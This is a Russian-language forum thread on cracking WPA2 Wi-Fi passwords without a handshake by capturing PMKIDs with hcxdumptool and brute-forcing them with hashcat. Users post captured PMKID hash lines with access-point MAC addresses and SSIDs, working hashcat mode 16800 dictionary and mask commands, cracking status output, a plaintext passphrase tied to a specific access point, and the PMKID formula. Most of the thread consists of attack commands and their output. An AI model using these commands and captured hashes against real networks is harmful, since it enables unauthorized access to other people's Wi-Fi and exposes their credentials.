Брут WPA2 без handshake используя PMKID + hashcat

rara_ivis
1. кот нашёл 150760Tusia
2.wifipr нашёл 150760Tusia
3.Пробелы между * это так,чтобы побольше геморроя тестирующим?Я вот дурак например.Раза с третьего разобрался только чего это вдруг программа не принимает.
Оно ведь так не проще наверно?
5f3882ffb4b7ff1a2cb3cd6edcc05c31*28107b9d928c*a03299080f20*44534c2d3236303055

 

f0a2258ee88d - f4f5db3e5830
Строку покажи как кормил кота и ещё, мак адрес атакующего рандом был?
Возможно не тот словился pmkid

pmkid не меняется если запрос не менялся, мак*мак*ТД , другой мак, другой pmkid

 

пробелы появились сами , я скопировал текст из Linux в Wiнду и закинул сюда , пришлось еще несколько раз редактировать

 

pmkid ловил рандомно с помощю hcxdumptoo их уловил, 3 шт, скормил коту кот выдал это - 5f3882ffb4b7ff1a2cb3cd6edcc05c31 * 28107b9d928c * a03299080f20 * 44534c2d3236303055: xxx59456

я проверяю essid :

echo 44534c2d3236303055 | xxd -r -p

DSL-2600U

но я знаю что пас от этой тд - 150760Tusia
еще раз проверю , чет я вобще запутался. Пас ххх59456 не подошёл ни к какой из видимых т.д

 

Не, строку как переберал pmkid на валидный пароль, ты там обмолвился на счет словаря, то что выше это предполагаемый и ты перевел после хекс в Анси - это ТД

Сейчас с мобильного, так бы проверил, надо видимо на мобилу кота поставить

Кста бинарники где можно взять под арм64? Никто не знает?

 

вот сохраненные данные pmkid

5f3882ffb4b7ff1a2cb3cd6edcc05c31*28107b9d928c*a03299080f20*44534c2d3236303055
22662d2da3d91715cfa954646bab5591*c83a350b02d8*f4f5db3e5830*54656e64615f42534e
ec1faa47b83ec4a0304c63f064c698ad*c83a350b02d8*f0a2258ee88d*54656e64615f42534e

вот их ssid

root@kali:~# echo 44534c2d3236303055 | xxd -r -p
DSL-2600Uroot@kali:~# echo 54656e64615f42534e | xxd -r -p
Tenda_BSNroot@kali:~# echo 54656e64615f42534e | xxd -r -p
Tenda_BSNroot

скормил коту так
hashcat -m 16800 -a 0 -w 3 -o "temp_cracked.txt" test.16800 '/root/02_Slovo_ri/Mask_sborka.txt' --force
hashcat (v4.2.1) starting...

в словаре есть пас от ТД "DSL-2600" я его туда еще раз прописал на всяк случай но кот не определяет этот пасс

вот данные т.д

28:10:7B:9D:92:8C -69 88 91 2 6 65 WPA2 CCMP PSK DSL-2600U 150760Tusia

 

Может у Вас в словаре пробел на конце ?, попробуйте по маске.

 

Уже завтра розбор полетов будет , но мне разобратся в этом просто необходимо , ладно если это словарь кривой , другое дело если это баг , я час назад словил pmkid , c этой же т.д и кот кинул в папку с этим же словарем уже другой пасс , как то рандомно чтоли . По идее если hashcat не подбирает пасс он же не должен создавать папку с выводом ?

 

так попробуй для пробы, судя по скрину этот PMKID
для выньдос, под линухой возможно надо " заменить на '

hashcat.exe -m 16800 -a 3 -w 3 -o "crack_password.txt" "5f3882ffb4b7ff1a2cb3cd6edcc05c31*28107b9d928c*a03299080f20*44534c2d3236303055" ?d?d?d?d60Tusia --force

 

hashcat.exe -m 16800 -a 3 -w 3 -o "crack_password.txt" "5f3882ffb4b7ff1a2cb3cd6edcc05c31*28107b9d928c*a03299080f20*44534c2d3236303055" ?d?d?d?d60Tusia --force[/QUOTE]

по ходу кот сломался по маске не определяет пасс

hashcat --force -m 16800 -a 3 -w 3 -o "temp_cracked.txt" d73fc0f1bfd1d0cd360215e41ab555cc*c83a350b02d8*f0a225c1dd6c*54656e64615f42534e ?d?d?d?d60Tusia
hashcat (v4.2.1) starting...

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: d73fc0f1bfd1d0cd360215e41ab555cc*c83a350b02d8*f0a22...42534e
Time.Started.....: Sun Nov 11 04:25:33 2018 (37 secs)
Time.Estimated...: Sun Nov 11 04:26:10 2018 (0 secs)
Guess.Mask.......: ?d?d?d?d60Tusia [11]
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 271 H/s (56.36ms) @ Accel:256 Loops:128 Thr:1 Vec:4
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 10000/10000 (100.00%)
Rejected.........: 0/10000 (0.00%)
Restore.Point....: 1000/1000 (100.00%)
Candidates.#1....: 681360Tusia -> 676460Tusia
HWMon.Dev.#1.....: N/A

Started: Sun Nov 11 04:25:28 1632
Stopped: Sun Nov 11 04:26:12 1631

 

Да ну?

Tenda_BSN

Tenda_BSN

DSL-2600U
Троллинг мультакк?

 

Я глубоко извиняюсь конечно перед теми кто потратил свое время на меня , конечно же с котом и с hcxами все в порядке .
Это очередной пример того что перед тем как бить в колокола нужно с начала углубитться в мануалы, рукаводства и саму тему
а уже потом тревожить гуру этого чата .

сейчас кот мне выдает -это : INFO: All hashes found in potfile! Use --show to display them

похоже хеши в hashcat.potfile

вобщем дорога мне в hashcat.net/wiki/

 

кто нибудь сравнивал фактическое быстродействие hashcat и john? версия 18013-omp-x64 понимает pmkid\16800-16001

 

а я попробовал нефильтрованный созданный hcxdumptool файл.pcapng протестировать на онлайн-сервисах.
В hcxdumptool применил фильтр канала и фильтр мак-адреса и с телефона подключался неправильным паролем к точке. Так hcxdumptool помимо моего хендшейка (причём без PMKID) захватил ещё один левый в обход моего фильтра и на ондлайн-сервисе расшифровался только мой неправильный пароль.
но самое поганое, что захватил он в обход фильтра 1 левый хендшейк, но ещё проскакивал 1 PMKID и он его не записал.

 

Возможно онлайн-сервис и не предполагает наличие двух разных паролей с одинаковой солью в одном файле (что логично) и прекращает перебор после первого найденного пароля

 

но вот, что странно:
открыл я этот pcapng как текстовый файл и обнаружил где-то в середине чьё-то имя и фамилию на русском! откуда они там взялись???
ну и ещё пара слов на русском тоже были в разных местах файла.

 

Открой в Wireshark и посмотри, в каких конкретно пакетах всё это дело.

Может кто-то пытался к Wi-Fi сетям с русскими названиями подключаться.

 

да, оказалось именно так.

 

Есть точка, для каждого MAC "клиента" шлёт разный PMKID. (1-й пакет)
Так и должно быть, это так и работает?

 

Надо было учить матчасть.

Code:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)